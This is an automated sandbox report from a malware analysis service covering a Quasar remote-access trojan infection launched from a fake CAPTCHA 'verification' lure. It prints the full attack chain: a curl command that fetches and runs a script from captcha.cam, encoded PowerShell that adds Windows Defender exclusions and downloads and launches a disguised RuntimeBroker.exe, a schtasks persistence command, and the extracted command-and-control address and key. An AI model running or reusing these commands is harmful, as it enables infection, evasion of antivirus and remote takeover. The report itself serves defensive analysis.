Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
44s -
max time network
45s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
30/12/2024, 03:20
Static task
static1
URLScan task
urlscan1
Malware Config
Extracted
https://captcha.cam/file.b64
Extracted
quasar
1.4.1
28
194.26.192.167:2768
859d5f90-e2d0-4b2d-ba9f-5371df032ec2
-
encryption_key
BE2B0B270E4DB19CAA5C42E9D2EBF64645A2D055
-
install_name
RuntimeBroker.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
RuntimeBroker
-
subdirectory
RuntimeBroker
Signatures
-
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral1/files/0x000a000000023bae-448.dat family_quasar behavioral1/memory/3920-456-0x0000000000AB0000-0x0000000000DD4000-memory.dmp family_quasar -
Blocklisted process makes network request 1 IoCs
flow pid Process 92 3184 powershell.exe -
pid Process 3596 powershell.exe 4932 powershell.exe 3352 powershell.exe 1500 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 3920 RuntimeBroker.exe 3708 RuntimeBroker.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1444 schtasks.exe 4844 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 21 IoCs
pid Process 3596 powershell.exe 3596 powershell.exe 3596 powershell.exe 3352 powershell.exe 3352 powershell.exe 3352 powershell.exe 4932 powershell.exe 4932 powershell.exe 4932 powershell.exe 920 powershell.exe 920 powershell.exe 920 powershell.exe 1500 powershell.exe 1500 powershell.exe 1500 powershell.exe 5004 powershell.exe 5004 powershell.exe 5004 powershell.exe 3184 powershell.exe 3184 powershell.exe 3184 powershell.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 764 firefox.exe Token: SeDebugPrivilege 764 firefox.exe Token: SeDebugPrivilege 3596 powershell.exe Token: SeDebugPrivilege 3352 powershell.exe Token: SeDebugPrivilege 4932 powershell.exe Token: SeDebugPrivilege 920 powershell.exe Token: SeDebugPrivilege 1500 powershell.exe Token: SeDebugPrivilege 5004 powershell.exe Token: SeDebugPrivilege 3184 powershell.exe Token: SeDebugPrivilege 3920 RuntimeBroker.exe Token: SeDebugPrivilege 3708 RuntimeBroker.exe -
Suspicious use of FindShellTrayWindow 21 IoCs
pid Process 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe -
Suspicious use of SendNotifyMessage 20 IoCs
pid Process 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe 764 firefox.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 764 firefox.exe 3708 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3260 wrote to memory of 764 3260 firefox.exe 82 PID 3260 wrote to memory of 764 3260 firefox.exe 82 PID 3260 wrote to memory of 764 3260 firefox.exe 82 PID 3260 wrote to memory of 764 3260 firefox.exe 82 PID 3260 wrote to memory of 764 3260 firefox.exe 82 PID 3260 wrote to memory of 764 3260 firefox.exe 82 PID 3260 wrote to memory of 764 3260 firefox.exe 82 PID 3260 wrote to memory of 764 3260 firefox.exe 82 PID 3260 wrote to memory of 764 3260 firefox.exe 82 PID 3260 wrote to memory of 764 3260 firefox.exe 82 PID 3260 wrote to memory of 764 3260 firefox.exe 82 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 4996 764 firefox.exe 83 PID 764 wrote to memory of 1712 764 firefox.exe 84 PID 764 wrote to memory of 1712 764 firefox.exe 84 PID 764 wrote to memory of 1712 764 firefox.exe 84 PID 764 wrote to memory of 1712 764 firefox.exe 84 PID 764 wrote to memory of 1712 764 firefox.exe 84 PID 764 wrote to memory of 1712 764 firefox.exe 84 PID 764 wrote to memory of 1712 764 firefox.exe 84 PID 764 wrote to memory of 1712 764 firefox.exe 84 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://medai.tv"1⤵
- Suspicious use of WriteProcessMemory
PID:3260 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://medai.tv2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2008 -parentBuildID 20240401114208 -prefsHandle 1940 -prefMapHandle 1932 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a6ce8aba-93c6-4537-85cb-908f87db836d} 764 "\\.\pipe\gecko-crash-server-pipe.764" gpu3⤵PID:4996
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2316 -parentBuildID 20240401114208 -prefsHandle 2436 -prefMapHandle 2432 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0f7289fc-3140-428d-a6e8-a26042a6cc23} 764 "\\.\pipe\gecko-crash-server-pipe.764" socket3⤵PID:1712
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3112 -childID 1 -isForBrowser -prefsHandle 3140 -prefMapHandle 2628 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fdf57289-1334-4bba-8b17-12169bfb1fac} 764 "\\.\pipe\gecko-crash-server-pipe.764" tab3⤵PID:4312
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3668 -childID 2 -isForBrowser -prefsHandle 3576 -prefMapHandle 2616 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b48e739-1c3b-4774-92fd-542f144bba33} 764 "\\.\pipe\gecko-crash-server-pipe.764" tab3⤵PID:4036
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4520 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4508 -prefMapHandle 4512 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {953d5e7e-af0b-4a3e-9540-4936c3682eef} 764 "\\.\pipe\gecko-crash-server-pipe.764" utility3⤵
- Checks processor information in registry
PID:4756
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5456 -childID 3 -isForBrowser -prefsHandle 5436 -prefMapHandle 5416 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {77771912-dd94-4862-b468-199954f4ec4a} 764 "\\.\pipe\gecko-crash-server-pipe.764" tab3⤵PID:3244
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3088 -childID 4 -isForBrowser -prefsHandle 3156 -prefMapHandle 3172 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {de42e1e9-9c6d-4f08-b865-b80cee315325} 764 "\\.\pipe\gecko-crash-server-pipe.764" tab3⤵PID:3264
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5464 -childID 5 -isForBrowser -prefsHandle 3048 -prefMapHandle 3184 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4368b503-61a7-476d-b36d-59d1bc781c57} 764 "\\.\pipe\gecko-crash-server-pipe.764" tab3⤵PID:3256
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5960 -childID 6 -isForBrowser -prefsHandle 5880 -prefMapHandle 5888 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb28e191-7c5e-4eff-b6b2-cf94ffe7d9f9} 764 "\\.\pipe\gecko-crash-server-pipe.764" tab3⤵PID:1460
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5780 -childID 7 -isForBrowser -prefsHandle 5872 -prefMapHandle 6100 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9cf56ab8-6b9e-4cbf-8022-acd6309dd742} 764 "\\.\pipe\gecko-crash-server-pipe.764" tab3⤵PID:2112
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "curl -k -L -Ss https://captcha.cam/t.cmd -o "C:\Users\Admin\AppData\Local\Temp\1.cmd" && "C:\Users\Admin\AppData\Local\Temp\1.cmd"" # Press OK or ENTER to complete verification. By pressing OK you confirm you are not a robot.1⤵PID:4632
-
C:\Windows\system32\curl.execurl -k -L -Ss https://captcha.cam/t.cmd -o "C:\Users\Admin\AppData\Local\Temp\1.cmd"2⤵PID:4932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w h -command ""2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process -Verb RunAs -FilePath '"C:\Users\Admin\AppData\Local\Temp\1.cmd"' -ArgumentList 'am_admin'"2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3352 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\1.cmd" am_admin3⤵PID:5032
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w h -command ""4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:920 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5004 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\5⤵PID:4632
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enc JAB1AHIAbAA9ACIAaAB0AHQAcABzADoALwAvAGMAYQBwAHQAYwBoAGEALgBjAGEAbQAvAGYAaQBsAGUALgBiADYANAAiADsAJABiADYANABGAGkAbABlAD0AIgAkAGUAbgB2ADoAVABlAG0AcABcAGYAaQBsAGUALgBiADYANAAiADsAJABlAHgAZQBGAGkAbABlAD0AIgAkAGUAbgB2ADoAVABlAG0AcABcAFIAdQBuAHQAaQBtAGUAQgByAG8AawBlAHIALgBlAHgAZQAiADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGwAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGIANgA0AEYAaQBsAGUAOwBbAEkATwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAEIAeQB0AGUAcwAoACQAZQB4AGUARgBpAGwAZQAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAGIANgA0AEYAaQBsAGUAIAAtAFIAYQB3ACkAKQApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQB4AGUARgBpAGwAZQA=4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3184 -
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3920 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\RuntimeBroker\RuntimeBroker.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:1444
-
-
C:\Users\Admin\AppData\Roaming\RuntimeBroker\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\RuntimeBroker\RuntimeBroker.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3708 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\RuntimeBroker\RuntimeBroker.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:4844
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5baf55b95da4a601229647f25dad12878
SHA1abc16954ebfd213733c4493fc1910164d825cac8
SHA256ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924
SHA51224f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\y0bypz8z.default-release\activity-stream.discovery_stream.json
Filesize28KB
MD56685f0193b32e7070ad78a8bd98c8a8b
SHA1148f69a0c0150c696f23b7180d43c8b12ab67843
SHA25612a696848d0c6cc78951b2b813c5382909b0bdc363a52f1d8b470938e070e096
SHA512d1a55e074a814a5e67c4f9254286a3d33556d285bb2aed026013514c78397b6c77a02af0413f0b9984096c71791fe9ba7f39e19a2637781ef568e8f45380fedd
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\y0bypz8z.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
1KB
MD5104cc53cf2a78348c132b27766627399
SHA16c1c7eff5c6f5520473f8c861c9408b0cd07d7cf
SHA256995acc6b43d40f9f8236dfc7b581a8afa2f06c538222d329fef9e6f0b6f4bd18
SHA512290406d75bdec56531723c245fe55f632415abd4022fb9aebd6a332d0eb33cbd9dec241076534a2265eeacc617afa058cc5c9b170859dc3263042af1e30d1e0b
-
Filesize
3.1MB
MD5b94af11cca65c557d23559e978a49d18
SHA10c3436d0c5df8e2e39bf4869bbe4413ca8d594b7
SHA256f6a0a782d574de811fe66ecf6416c69b486f9ca20faf96cfc863a00063306338
SHA512c1254360b2382957f043b8edcf36b28f13a93d0860dc9609d9b46eded81bc004e4149113e9eaad8b4d2cc18164942588bd4e97ecd8fce4f9afd8e537bc668b16
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
Filesize
13.8MB
MD50a8747a2ac9ac08ae9508f36c6d75692
SHA1b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA25632d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA51259521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\AlternateServices.bin
Filesize6KB
MD5042618aac354ed6ecd6ead6fbd860e7d
SHA19edf43c8756fd8b2b6413a872c5383a0a23cb776
SHA256db7253a942ccb701cec65268037509f8a8e68cb5e71640bf2fd7586ffa8e520f
SHA512b9d4a843cb8b3b320e25cc6df25d4d266432914bf60209a5b0f3468f757a42748fb37ba9a1211435a6f6cb8fac1e4a2368101e03ece359829df90cd57426840c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\AlternateServices.bin
Filesize10KB
MD530d20c1d453d8bd1cbf70f02338def30
SHA1408bfa8f0e8e4f2f1b9d9f34d6e7def1fa490969
SHA256e33285efc3260432b1b676e151d165f0efe5ba19690cfe9c28c3889f3cb8821b
SHA512b44cf52f2e84f88bfc251703eeef09390a1d3f8f6146b3a62a9987eb959a79e30748e2d3b5ff8b59852bd1b3bbd700e0cb7080cfd6cb6aa89a67bd1605370bc6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\datareporting\glean\db\data.safe.tmp
Filesize22KB
MD5654a8276583c6ceadd297dcb57c6c780
SHA1c7cc07d790fa52847af06794affeef4f8f5c64eb
SHA256ba64d888529475d8529eff5490ae4226bee7ca15b0f86a0d4f2e85ace72dcd14
SHA51276ee4eb922d2977283a8e835f12e59f6e035ae0a38d9995a119f14a1f00cf8efb6e370eba5ecb8a80ea301f94e07b3c33b833032d1db1a4667aaa91b2c9ab64c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\datareporting\glean\db\data.safe.tmp
Filesize23KB
MD57c620f2920487e278cbe9224e9d196a4
SHA19138eae3ba38ad2c1b4bd8c0c21d394608d3b200
SHA25697dee508bdddcbdd4d29d0d10bdbea574b729dfc91c127271d7829ac8b51c6b0
SHA5121ead843c7310e717cbbcfb663f1afea889b128670a5cc0bf70308fa26eb291e3d732230fee5ccd8c20301304329d9fa8a516ed009ec09e35707b3a532d22afce
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\datareporting\glean\db\data.safe.tmp
Filesize22KB
MD52c88cee63a87d9b787b3d79fe4241c7c
SHA1cbf3c111fab385dfc9be6c4d3ff09772c92b8959
SHA2561c1c026c8b4203a0c4721580052a5d8dac564e2150666213a1cc4aff2dc54438
SHA51288954be7d00d2b1415d23ad727c66db66b10231e28cbdf74896cd5c69b08998af64476cc23a119d62dc563cb5b4af126e0dd83b77d8caf9fb76c2241883ddb11
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\datareporting\glean\pending_pings\40c2033f-65d9-4180-8b36-898c9194b65f
Filesize659B
MD5ac5f67f3bf81da1c251cd21c940cc06c
SHA171e732b72420b0f20b9f698a826ad283d217d6b5
SHA2566611054e25f75d74a08f84a16a46b6afec95f9f8001f416ee8bf6a29a5217c53
SHA512e81bfd75e4772e86b02688c133522d7d928ad37814dd890f45d18ba29ad5871b2f23cbeb06bcd44dd1ac0eaed10486e98a77e7f976fcac693c4048fbf1f855df
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\datareporting\glean\pending_pings\ecbcaf5a-8e76-466a-92b4-8252a6113547
Filesize982B
MD5fafe9bb87997f0e6fae6f05b4732cf03
SHA12e45bfeafe087293de236119b0487703e2251c3d
SHA256a07f537ff80329a053345036cf9d5b531468d4e0dac78c35921df7e6b3c51e17
SHA512db9c50264b144f762a3d7b00c5e67b97007c38a6ba411ccaf8debd838206232dd0cd8a9059911b232a39dcfcd9166b84b968334d78b9057b49a883f40ad8e572
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
